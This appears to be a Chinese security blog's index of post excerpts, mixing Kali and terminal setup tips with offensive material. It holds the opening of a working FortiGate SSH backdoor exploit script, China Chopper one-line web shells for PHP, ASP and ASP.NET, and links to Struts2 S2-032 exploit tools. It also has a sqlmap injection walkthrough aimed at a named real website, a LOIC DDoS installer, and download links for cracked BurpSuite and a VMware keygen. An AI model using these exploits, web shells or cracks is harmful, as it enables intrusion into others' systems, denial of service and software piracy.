正好要更新下VMware，分享下 VMware Workstation Pro 12.5.2 Build 4638234 VMware12官方版注册机：https://pan.baidu.com/s/1eSO5s6e#gbfb访问码gbfb VMware12官方版：https://download3.vmware.com/software/wkst/file/VMware-workstation-full-12.5.2-4638234.exe ...继续阅读 (16)

漏洞概述zabbix是一个开源的企业级性能监控解决方案。 官方网站：http://www.zabbix.com zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统，也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。 漏洞利用方式见：传送门用ZoomEye搜索一下发现有很多嘛：传送门 ...继续阅读 (18)

Struts2 S2-032批量检测工具 把要测试的url放在一个文本文档保存成s2.txt。然后运行 s2-032.py s2.txt 即可。测试成功的url会保存在同目录下s2-032_success.txt，不成功则不返回。 链接:http://pan.baidu.com/s/1i5Rhshv密码: uwpb ...继续阅读 (130)

好久上来了 第一个Struts2 S2-032利用工具EXP    链接:http://pan.baidu.com/s/1eRByfEa密码: 5tpp 第二个Struts2 S2-032利用工具EXP   链接:http://pan.baidu.com/s/1kVElXAZ密码: 6mgm   ...继续阅读 (145)

飞塔系统存在SSH后门影响版本 4.0 – 5.0.7，影响很大，利用代码如下#!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py import socket import select import sys import paramiko from paramiko.py3compat import u import base64 import hashlib import termios import tty def custom_handler(title, instructions, prompt_list): n = prompt_list[0][0] m = hashlib.sha1() m.update('\x00' * 12) m.update(n + 'FGTAbc11*xy+Qqz27') m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') h = 'AK1' + base64.b64encode('\x00' * 12 + m.d ...继续阅读 (37)

晚上一朋友加我QQ问我有没有最新的BurpSuite，现在用的BurpSuite_pro_v1.6.27到12月3日就过期了，最近的几个破解版本也都是3号到期，扭头问群里谁有，tennc直接发来了最新的到2016-12-3的，发出来共享下 ：）BurpSuite_pro_v1.6.27最新破解版传送门：http://pan.baidu.com/s/1sjEcuUL密码: nb5y ...继续阅读 (282)

Mark一下下载reGeorg-master (https://github.com/sensepost/reGeorg)，Copy到C:\Python27\ 。安装setuptools（a）下载ez_setup.py（https://pypi.python.org/pypi/setuptools#windows-simplified），Copy到 C:\Python27\ 。 （b）在命令提示符下切换到C:\Python27\，依次运行如下命令 python  ez_setup.py  build python  ez_setup.py  install安装Pip(a)下载地址http://pypi.python.org/packages/source/p/pip/pip-1.0.tar.gz(b) 依次运行如下命令 python  setup.py  build python  setup.py  install安装urllib3切换到C:\Python27\Scripts，直接运行pip  install  urllib3 。 reGeorg安装完成。 ...继续阅读 (250)

正好今天用到Mark一下 @echo off set /p before=请输入前面的字符 set /p after=请输入后面的字符 for /f "delims=" %%i in (1.txt) do ( if "%%i"=="" ( echo.>>2.txt ) else ( echo %before%%%i%after%>>2.txt ) ) ren 2.txt 1.txt ...继续阅读 (23)

来源：http://zone.wooyun.org/content/23474Mark一下起因：看到这个求助贴[http://zone.wooyun.org/content/23466]菜刀readme.txt中附带一3个一句话：PHP:    <?php @eval($_POST['chopper']);?> ASP:    <%eval request("chopper")%> ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>抛弃密码的长度不算，其实这3个一句话均不是最短的。如：PHP我们可以这样写：<?php @eval($_POST['0']);?>   原版 <?=eval($_POST[0]);?>         缩小版ASP我们可以这样写：<%eval request("0")%>   原版 <%eval request(0)%>     缩小版ASP.NET可以这样写：<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");% ...继续阅读 (34)

[caption id="attachment_1588" align="aligncenter" width="853"]Burpsuite_pro_v1.6.24破解版下载地址：[/caption] 链接:http://pan.baidu.com/s/1ntvM3vr密码: d6i1 ...继续阅读 (44)

[caption id="attachment_1580" align="aligncenter" width="846"]Burpsuite_pro_v1.6.19破解版[/caption] burpsuite_pro_v1.6.19破解版链接:http://pan.baidu.com/s/1hqGnb72密码: b5yi ...继续阅读 (174)

我是谁没有绝对安全的系统BD1280高清德语中字.mp4thunder://QUFlZDJrOi8vfGZpbGV8JUU2JTg4JTkxJUU2JTk4JUFGJUU4JUIwJTgxJUVGJUJDJTlBJUU2JUIyJUExJUU2JTlDJTg5JUU3JUJCJTlEJUU1JUFGJUI5JUU1JUFFJTg5JUU1JTg1JUE4JUU3JTlBJTg0JUU3JUIzJUJCJUU3JUJCJTlGLkJEMTI4MCVFOSVBQiU5OCVFNiVCOCU4NSVFNSVCRSVCNyVFOCVBRiVBRCVFNCVCOCVBRCVFNSVBRCU5Ny5tcDR8MTE5MzI0MzYzOHxGQzc1RDIzQ0I1MjU3QzZBRTU5NzFDNzBDMzZGMzFENXxoPVNGUEs1VFVIWEpHSlRCN1NHRFMzWFdLRlM1VFdSQlNUfC9aWg== ...继续阅读 (26)

群里看到BurpSuite又更新了，给大家传送一下 ：) burpsuite_pro_v1.6.17  链接: http://pan.baidu.com/s/1pJ2xjXT 密码: incx 没想到没几天又更新了，图就不重新传了，给出下载链接吧 burpsuite_pro_v1.6.18链接: http://pan.baidu.com/s/1bn0Kar9 密码: hvzb ...继续阅读 (41)

/** *    Author :xiaomiao * *    专注于互联网安全，网站开发 * *    如有问题，可以在新浪@苗_创 * **/1.SQLMAP用于Access数据库注入(1)猜解是否能注入 win:  python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" Linux : ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" (2)猜解表 win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --tables Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"  --tables (3)根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表) win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --columns -T admin Linux: ./sqlmap.py -u ...继续阅读 (43)

KEYBINDINGSThe following keybindings can be used to control Terminator:Ctrl+Shift+OSplit terminals Horizontally.（上下开新窗口）Ctrl+Shift+ESplit terminals Vertically.（垂直开新窗口）Ctrl+Shift+RightMove parent dragbar Right.（放大当前窗口 向右）Ctrl+Shift+LeftMove parent dragbar Left.Ctrl+Shift+UpMove parent dragbar Up.Ctrl+Shift+DownMove parent dragbar Down.Ctrl+Shift+SHide/Show Scrollbar.（隐藏滚动条）Ctrl+Shift+FSearch within terminal scrollbackCtrl+Shift+N or Ctrl+TabMove to next terminal within the same tab, use Ctrl+PageDown to move to the next tab. If cycle_term_tab is False, cycle within the same tab will be disabled ...继续阅读 (37)

群里看到tennc发的Kali Linux截图，终端样式很炫， So…… 安装终极Shell zsh，拥有更强的补全功能(常用工具的参数补全)apt-get install zsh#引入增强插件,支持git,rails等补全，可选多种外观皮肤wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh#zsh作为默认shell，重启后生效chsh -s /bin/zshoh-my-zsh支持很多皮肤和插件，我就觉得这个皮肤不错，安装方法如下 首先安装字体wgethttps://gist.githubusercontent.com/qrush/1595572/raw/417a3fa36e35ca91d6d23ac961071094c26e5fad/Menlo-Powerline.otf双击字体完成安装 然后安装皮肤 在~/.oh-my-zsh/themes目录下执行wgethttps://gist.githubusercontent.com/agnoster/3712874/raw/c3107c06c04fb42b0ca27b0a81b15854819969c6/agnoster.zsh-theme然后修改~/.zshrc文件ZSH_THEME="agnost ...继续阅读 (65)

kali linux下安装loic软件并不复杂。这里我仅仅是为了给WAF设备做个测试。aptitude install git-core monodevelop#安装monodevelop运行环境mkdirloic && cd loicvim loic.sh#编辑shell脚本#!/bin/bash# Copyfuck © 2010 q## This script installs, updates and runs LOIC on Linux.## Supported distributions:# * Ubuntu# * Debian# * Fedora## Usage: bash ubuntu_loic.bash <install|update|run>#GIT_REPO=http://github.com/NewEraCracker/LOIC.git GIT_BRANCH=master DEB_MONO_PKG="monodevelop liblog4net-cil-dev"FED_MONO_PKG="mono-basic mono-devel monodevelop mono-tools"lower() { tr'[A-Z]''[a-z]'} what_distro() {ifwhich lsb_release ...继续阅读 (84)

Kali Linux要使用VPN却发现无法新建，这里需要安装一些依赖包apt-get install network-manager-openvpn-gnomeapt-get install network-manager-pptpapt-get install network-manager-pptp-gnomeapt-get install network-manager-strongswanapt-get install network-manager-vpncapt-get install network-manager-vpnc-gnome/etc/init.d/network-manager restartapt-get -y install network-manager-gnomemv /etc/network/interfaces /etc/network/interfaces.baktouch /etc/network/interfacesecho "auto lo" > /etc/network/interfacesecho "iface lo inet loopback" >> /etc/network/interfacesservice network-manager start安装完后就可以新建VPN了，不过建好后发现点击没有反映 ...继续阅读 (50)

1. 登陆 nessus 网站http://www.tenable.com/products/nessus/select-your-operating-system选择 Linux系统---选择debian系统 点击 并同意agree 进行下载。2. 然后进行解压缩：dpkg --unpack Nessus-5.0.3-debian6_i386.debar vx Nessus-5.0.3-debian6_i386.debtar -xzvf data.tar.gztar -xzvf control.tar.gz3. 启动服务/etc/init.d/nessusd start   启动服务update-rc.d nessusd enable  设置开机启动4.查看服务监听端口8834netstat -tnal | grep :88345.访问 https://127.0.0.1:88346.申请nessus激活码 (貌似需要翻墙请自备梯子)http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code填写注册信息提交即可获得激活码。 ...继续阅读 (26)

一个有着7年历史的网络间谍战最近瞄准了全球的大公司的高级主管,当这些高级主管公差出行住在高档酒店的时候，他们的信息就被那些精心设计的0day和键盘记录器窃取了。   来自莫斯科的卡巴斯基安全研究员把这种有能力知道目标主管何时入住，何时退房的APT威胁,命名为 “黑暗旅馆APT”。   这个团体自从2009以业就在亚州区域活动,但也有迹象表明在美国，韩国,新加坡,德国,爱尔兰,和其他等地出现。它通过旅馆的无线网络来瞄准那些在制造业、国防、投资资本、私人股本、汽车等行业的精英主管们。   卡巴斯基的报告里指出,这个团队有能力接触到一个0day 漏洞，并且使用它们感染受害者,而且通过了三种恶意的分发方式,包括恶意的Wifi,设为后门的torrent种子,还有高度定制的钓鱼网站。 当指定的高级主管们连到酒店的wifi 或者有线网时,他们会看到一个伪造的,并且看起来很合理的提醒,比如Adobe Flash 更新,Google Toolbal 或者 Windows Messenger 更新,但是这些更新包含许多恶意软件。   安全研究员在周一发表的报告里指出，当这些高级主管们到各式各样的旅馆入住，并且连上网络里，他们就被稀有的APT 木马感染了。第一阶段的恶意软件帮助攻击者下载后续更多的窃取工具。   在旅馆里,这些安装工 ...继续阅读 (22)

[caption id="attachment_1525" align="aligncenter" width="598"]camera1[/caption]256个国家7.3万个摄像头由于弱口令的原因可以随意浏览！！！   上图是北京的一个机房，连KVM也没有看样子机房不大。[caption id="attachment_1526" align="aligncenter" width="598"]camera2[/caption]你在家里装摄像头又不设置个复杂的密码，后果就是你看电视的时候，别人在电脑上看你！传送门：http://www.insecam.cc ...继续阅读 (42)